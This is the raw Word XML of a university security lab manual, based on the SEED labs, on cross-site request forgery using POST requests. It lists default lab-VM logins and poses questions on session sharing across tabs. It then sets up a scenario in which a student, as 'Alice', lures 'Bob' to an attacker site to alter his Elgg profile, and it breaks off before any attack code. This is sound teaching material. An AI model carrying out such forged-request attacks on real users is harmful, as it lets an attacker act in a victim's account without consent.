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5E00" w:rsidRDefault="00696527" w:rsidP="00615E00">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00696527">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Request Forgery (CSRF) Attack </w:t>
      </w:r>
      <w:r w:rsidR="006965D0" w:rsidRPr="006965D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidR="005C3A69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="006965D0" w:rsidRPr="006965D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00696527" w:rsidRDefault="00696527" w:rsidP="00615E00">
      <w:pPr>
        <w:jc w:val="center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(Aka: Session R</w:t>
      </w:r>
      <w:r w:rsidRPr="00696527">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>iding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36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801A3" w:rsidTr="009801A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009801A3" w:rsidRDefault="009801A3" w:rsidP="009801A3">
            <w:pPr>
              <w:jc w:val="center"/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Copyrights</w:t>
            </w:r>
            <w:r w:rsidR="004779BB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2016</w:t>
            </w:r>
            <w:r w:rsidR="00006176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-2017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Frank Xu, Bowie State University.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009801A3" w:rsidRDefault="009801A3" w:rsidP="009801A3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="36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The lab manual is developed for teaching cyber-related courses</w:t>
            </w:r>
            <w:r w:rsidR="00F41B76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based on </w:t>
            </w:r>
            <w:r w:rsidR="00F41B76" w:rsidRPr="00F41B76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http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_CSRF_Elgg/Web_CSRF_Elgg.pdf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. Comments and suggestions can be sent to wxu@bowiestate.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009801A3" w:rsidRDefault="009801A3" w:rsidP="009801A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00696527" w:rsidRPr="00696527" w:rsidRDefault="00696527" w:rsidP="009801A3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696527">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00696527" w:rsidRPr="00EB2649" w:rsidRDefault="00670550" w:rsidP="00670550">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/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5435600" cy="4076700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Image result for cross site request forg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ross site request forger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1865" cy="4081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05CC" w:rsidRPr="00B0750A" w:rsidRDefault="007A05CC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B0750A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRPr="00977144" w:rsidRDefault="007A05CC" w:rsidP="007A05CC">
      <w:pPr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>We have created two accounts in the VM. The usernames and passwords are listed in the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRPr="00874767" w:rsidRDefault="007A05CC" w:rsidP="00BF3017">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="648"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00874767">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">User ID: root, Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6B74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>seedubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00874767">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRPr="00977144" w:rsidRDefault="007A05CC" w:rsidP="00BF3017">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="936"/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 xml:space="preserve">Note: Ubuntu does not allow root to login directly from the login window. You have to login as a normal user, and then use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="002E4B1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidRPr="00977144">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to login to the root account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00874767" w:rsidRPr="00B3345D" w:rsidRDefault="007A05CC" w:rsidP="00BF3017">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="648"/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 xml:space="preserve">User ID: seed, Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6B74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>dees</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3345D" w:rsidRPr="00B3345D" w:rsidRDefault="00B3345D" w:rsidP="00B3345D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRDefault="00527399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B0750A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1: </w:t>
      </w:r>
      <w:r w:rsidR="000548E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Understand all Tabs of a Browser Share the Same Session ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00946273" w:rsidRPr="00030619" w:rsidRDefault="00946273" w:rsidP="00DC2E11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Open Amazon.com</w:t>
      </w:r>
      <w:r w:rsidR="00DC2E11" w:rsidRPr="00030619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and view your orders. Amazon asks your user name and password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040691C" w:rsidRDefault="00030619" w:rsidP="00CA2904">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3618C068" wp14:editId="6147F0DB">
            <wp:extent cx="3246619" cy="3784600"/>
            <wp:effectExtent l="152400" t="152400" r="354330" b="3683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64437" cy="38053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0548E9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1F5E" w:rsidRDefault="00030619" w:rsidP="0040691C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD4411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Question</w:t>
      </w:r>
      <w:r w:rsidR="003C1F5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040691C" w:rsidRDefault="00030619" w:rsidP="003C1F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD4411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>If you open second tab in the same browser and try to check your orders in Amazon, do you have to retype your user name and password?</w:t>
      </w:r>
      <w:r w:rsidR="00D812E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="00EA66CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>hy?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C1F5E" w:rsidRPr="003C1F5E" w:rsidRDefault="003C1F5E" w:rsidP="003C1F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">If you log out in the first tab and try to check your orders in Amazon in the second tab, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>do you have to retype your user name and password?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00475343" w:rsidRDefault="00475343" w:rsidP="00475343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2: </w:t>
      </w:r>
      <w:r w:rsidR="00863304">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Demonstrate CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00863304" w:rsidRPr="00863304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 Attack</w:t>
      </w:r>
      <w:r w:rsidR="00D66B24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 Using </w:t>
      </w:r>
      <w:r w:rsidR="00666EA1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="00D66B24" w:rsidRPr="004207EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00057907">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00D66B24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>equest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D28A9" w:rsidRDefault="0031766C" w:rsidP="00804AE0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="009D1D59" w:rsidRPr="009D1D59">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://www.csrflabelgg.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D1D59" w:rsidRPr="009D1D59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> is social website. </w:t>
      </w:r>
      <w:r w:rsidR="00927275" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidR="00927275">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00927275" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidR="00927275">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> both are </w:t>
      </w:r>
      <w:r w:rsidR="004C22EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>registered</w:t>
      </w:r>
      <w:r w:rsidR="00927275">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="004C22EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the developers of the SEED project, and she asks </w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to endorse the SEED project by adding the message "I support SEED project!" in his Elgg profile, but </w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, who does not like hands-on lab activities, refuses to do so. </w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidR="004D28A9" w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> is very determined, and she wants to try the CSRF attack on Bob. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D7A5F" w:rsidRDefault="004D28A9" w:rsidP="000A43E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, suppose you are </w:t>
      </w:r>
      <w:r w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidR="0020616F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,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4D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">your job is to launch such an attack. One way to do the attack is to post a message to </w:t>
      </w:r>
      <w:r w:rsidRPr="00056F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob’s</w:t>
      </w:r>
      <w:r w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elgg account, hoping that </w:t>
      </w:r>
      <w:r w:rsidRPr="00056F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> will click the URL inside the message. This URL will </w:t>
      </w:r>
      <w:r w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">lead </w:t>
      </w:r>
      <w:r w:rsidRPr="00056F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="004D28A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your malicious web site www.csrflabattacker.com, where you can launch the CSRF attack</w:t>
      </w:r>
      <w:r w:rsidR="0020616F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. Note that this time </w:t>
      </w:r>
      <w:r w:rsidR="0020616F" w:rsidRPr="007D70F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidR="0020616F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a malicious person and </w:t>
      </w:r>
      <w:r w:rsidR="0020616F" w:rsidRPr="007D70F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidR="0020616F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a victim</w:t>
      </w:r>
      <w:r w:rsidR="000A43E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D1D59" w:rsidRDefault="000A43E0" w:rsidP="000A43E0">
      <w:pPr>
        <w:rPr>
